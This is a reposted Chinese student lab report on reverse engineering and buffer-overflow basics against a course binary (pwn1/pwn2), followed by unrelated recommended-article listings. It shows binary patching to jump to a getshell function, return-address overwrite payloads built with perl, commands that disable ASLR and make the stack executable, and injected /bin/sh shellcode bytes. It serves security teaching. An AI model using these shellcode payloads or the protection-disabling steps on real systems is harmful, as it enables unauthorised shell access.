20155216 实验一 逆向与Bof基础

最新推荐文章于 2023-03-17 00:20:44 发布
最新推荐文章于 2023-03-17 00:20:44 发布
阅读量139 收藏
点赞数
原文链接:http://www.cnblogs.com/LeeX1997/p/8562568.html
版权

实验一 逆向与Bof基础

一、直接修改程序机器指令,改变程序执行流程

使用 objdump -d pwn1 对pwn1文件进行反汇编。

1071483-20180313195243091-484859516.png

可知main函数跳转至foo函数,先要使main函数跳转至getshell函数,即修改返回地址。

首先使用vi查看器查看pwn1文件,并使用 %!xxd 转换为十六进制查看:

1071483-20180313195810489-1134641643.png

利用 “:e8 d7”查找到需要修改的目标;

将“e8 d7”改为“e8 c3”。

1071483-20180313200154503-1977509087.png

使用 %!xxd -r将文件转换回原文件,保存退出后,再次反汇编进行查看。

1071483-20180313200459694-1002183611.png

此时,main函数返回地址被修改至getshell函数。

二、通过构造输入参数,造成BOF攻击,改变程序执行流

先使用gdb对pwn2文件进行调试:

1071483-20180313200843829-1626585805.png

接下来对函数进行输入数据的测试,意图找到eip中存在4位数。

输入测试数据“1111111122222222333333334444444455555555”,并使用 info r 查看堆栈指令:

1071483-20180313201342037-1996214198.png

此时,eip中存放的是35353535,35是5的ascii码值。

再次输入测试数据“1111111122222222333333334444444412345678”,并使用 info r 查看:

1071483-20180313201630570-1393044637.png

此时eip中存放34333231,即4321。

使用 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input 进行输入,再使用 xxd input 查看文件的十六进制:

1071483-20180313202232983-471027368.png

三、注入Shellcode并执行

首先先做实验准备,先利用 apt-get install execstack 下载··execstack··。

输入命令:

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space 
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space

构造输入: perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

其中,\x4\x3\x2\x1为溢出到eip的部分,也就是要修改为shellcode的首地址。

输入 (cat input_shellcode;cat) | ./pwn2 ,运行pwn2,然后打开顶一个终端,输入 ps -ef | grep pwn2 找到pwn2的进程号

利用进程号进入gdb调试:

1071483-20180313211235629-974643356.png

输入 disassemble foo 查看foo的栈地址:

1071483-20180313211338804-1279832497.png

输入 break *0x080484a5 设置断点,并continue。

然后输入info r,查看栈的地址;

1071483-20180313212153117-1646388742.png

然后输入x/32x 0xffffd35c,并不断修改范围,寻找01020304;

1071483-20180313212453021-296759122.png

之后在01020304的地址上加4,即d3 5c加4,使其覆盖之后的返回地址。

即填充 perl -e 'print "A" x 32;print "\x60\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 指令。

1071483-20180313213056287-1531794183.png

至此,覆盖成功。

实验成功。

转载于:https://www.cnblogs.com/LeeX1997/p/8562568.html

weixin_30486037
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0x03-逆向-BoF基础基础
0pr
06-04 1060
目录 今日目标 深入 BoF BoF 的前世今生 BoF 的种类 BoF 的应对策略 物理寻址的应用 找到 Boot Sector 在内存中的前两个字节的位置 寄存器 寄存器的种类 通用寄存器 段寄存器 指针寄存器 索引寄存器 控制寄存器 段和段寄存器小结 完成任务 程序拆解及必要汇编指令 org 指令 jmp 指令 times 指令 pusha popa 指令 条件控制指令 其他必要的汇编指令 总结 参考链接 今日目标 今天细看了一下 narnia2(不知道这是什
exp1 逆向Bof基础实验报告
LIULIULOO的博客
03-12 6529
20192209楼泽培《网络对抗技术》 exp1 逆向Bof基础 文章目录1 逆向Bof基础实践说明1.1 实践目标2 直接修改程序机器指令,改变程序执行流程3 通过构造输入参数,造成BOF攻击,改变程序执行流3.1 反汇编,了解程序的基本功能3.2 确认输入字符串哪几个字符会覆盖到返回地址3.3 确认用什么值来覆盖返回地址3.4 构造输入字符串4. 注入Shellcode并执行4.1 准备一段Shellcode4.2 准备工作4.3 构造要注入的payload。重新开始4.5 结合nc模拟远程攻击5.
Ep1 逆向Bof基础实践-20202127
qq_57435798的博客
03-15 273
只要我们构造的字符串能够溢出到EIP所在位置,将其中的返回地址“80484ba”覆盖为getShell函数的地址“804847d”,则程序执行完foo函数后将返回到getShell函数去执行。查看当前所有寄存器的值,其中EIP的值为“0x30393837”,对应字符“0987”,正是我们输入的第33~36个字节的内容。终端2继续执行,看到 01020304了,就是返回地址的位置。对应机器指令为“e8。因此,可以判断输入的第33~36个字节的内容会覆盖到栈上的返回地址,进而CPU会尝试运行这个位置的代码。
exp1 20194311姜晨昊 逆向Bof基础实验报告
weixin_51927594的博客
03-26 633
1. NOP, JNE, JE, JMP, CMP汇编指令的机器码: NOP:NOP指令即“空指令”。执行到NOP指令时,CPU什么也不做,仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。(机器码:90),实验中我们构造滑行区就是用的这个机器命令x90。 JNE:条件转移指令,如果不相等则跳转。(机器码:75) JE:条件转移指令,如果相等则跳转。(机器码:74) JMP:无条件转移指令。段内直接短转Jmp short(机器码:EB)段内直接近转移Jmp near(机器码:E9)段内间接转移
Exp1逆向Bof基础实践
04-18
网络对抗实验
20204323太晓梅 网络对抗技术 exp1 逆向Bof基础
m0_57567318的博客
03-17 334
linux 网络对抗技术 bof
北京林业大学在北京2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学2021-2024在北京各专业录取分数及最低位次
C++代码文档的版本控制:策略、工具与实
09-08
在软件开发过程中,代码文档的版本控制与代码本身的版本控制同等重要。它不仅帮助团队成员理解代码的变更历史,还有助于维护文档的一致性和准确性。C/C++作为广泛使用的编程语言,其代码文档的版本控制可以通过多种策略和工具来实现。本文将详细介绍如何在C/C++项目中实现代码文档的版本控制,探讨不同的版本控制策略,以及如何使用工具如Git来管理文档的版本。 代码文档的版本控制对于维护项目的健康和可维护性至关重要。通过使用Git等版本控制工具,可以有效地管理文档的变更历史,支持团队协作,并确保文档与代码的同步更新。遵循最佳实践,如编写清晰的提交信息和定期备份,可以进一步提高文档版本控制的效果。 代码文档的版本控制对于维护项目的健康和可维护性至关重要。通过使用Git等版本控制工具,可以有效地管理文档的变更历史,支持团队协作,并确保文档与代码的同步更新。遵循最佳实践,如编写清晰的提交信息和定期备份,可以进一步提高文档版本控制的效果。
JavaWeb课程设计,使用Struts2完成购物车增、删、查、改功能.zip
09-08
JavaWeb课程设计,使用Struts2完成购物车增、删、查、改功能.zip
中国民用航空飞行学院在北京2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学2021-2024在北京各专业录取分数及最低位次
jsp+servlet jsp课程设计.zip
09-08
jsp+servlet jsp课程设计.zip
统计gitlab的所有人代码量的开源项目(带页面)_gitlab-statistics.zip
最新发布
09-08
统计gitlab的所有人代码量的开源项目(带页面)_gitlab-statistics
西南交通大学在北京2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学2021-2024在北京各专业录取分数及最低位次
c-for-derivative-pricing
09-08
The C++ For Quantitative Finance book is designed to teach junior/prospective quants with some basic C++ skills to be a professional grade quantitative analyst with advanced C++ skills. The book describes advanced features of C++ such as templates, STL, inheritance, polymorphism and design patterns. In addition, the book applies these features to numerical methods used by quants, such as Finite Di erences and Monte Carlo, to numerically determine the price of derivatives. The book is driven by e
兰州财经大学在广东2021-2024各专业最低录取分数及位次表.pdf
09-08
全国各大学在广东省2021~2024年各专业最低录取分数及位次
本项目是我在日常工作学习的过程中,用到的java开发常用工具类,绝大部分
09-08
本项目是我在日常工作学习的过程中,用到的java开发常用工具类,绝大部分都是我自己在具体项目中形成的_syske-common-utils
遗传算法的概要介绍与分析
09-08
遗传算法(Genetic Algorithm, GA)是一种模拟自然选择和遗传学机制的搜索算法,广泛应用于解决复杂的优化问题。以下是一个关于遗传算法的资源描述及项目源码的简要概述: 资源描述 1. 原理与特点 遗传算法通过模拟生物进化过程中的选择、交叉(或称为重组)和变异等操作,在解空间中迭代搜索最优解。它不依赖于问题的具体领域,具有自组织、自适应和自学习性等特点,能够有效地处理传统优化算法难以解决的非线性、多模态和组合优化问题。 2. 应用领域 遗传算法在函数优化、组合优化、生产调度、自动控制、图像处理、机器学习等领域有着广泛的应用。它提供了一种求解复杂系统优化问题的通用框架,具有很强的鲁棒性和灵活性。 3. 学习资源 对于想要深入了解遗传算法的学习者来说,可以访问CSDN博客、简书等技术社区,这些平台上有大量的遗传算法教程、案例分析和源码分享。此外,学术搜索引擎如Google Scholar也能提供丰富的遗传算法相关论文和研究资料。 项目源码示例 以下是一个简单的遗传算法项目源码的片段(以Python为例),用于求解某个优化问题: python import ran
中科大-组合数学-邵帅-期中考试
09-08
中科大-组合数学-邵帅-期中考试
使用pandas BOF
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 resample() 方法。resample() 方法可以将时间序列数据转换成指定频率的数据,并且支持使用 BOF 进行时间聚合。BOF 的具体用法可以参考 Pandas 官方文档:https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases 。 下面是一个简单的示例,演示如何使用 BOF 来进行时间聚合: ``` python import pandas as pd import numpy as np # 创建一个包含随机数据的时间序列 rng = pd.date_range('1/1/2020', periods=100, freq='D') ts = pd.Series(np.random.randn(len(rng)), index=rng) # 使用 BOF 进行按周聚合 weekly_ts = ts.resample('W-WED').mean() ``` 在上述示例中,我们创建了一个包含随机数据的时间序列,然后使用 resample() 方法将时间序列按照 BOF 'W-WED' 进行聚合,这会将数据按照每周的周三进行聚合,并计算每周的平均值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值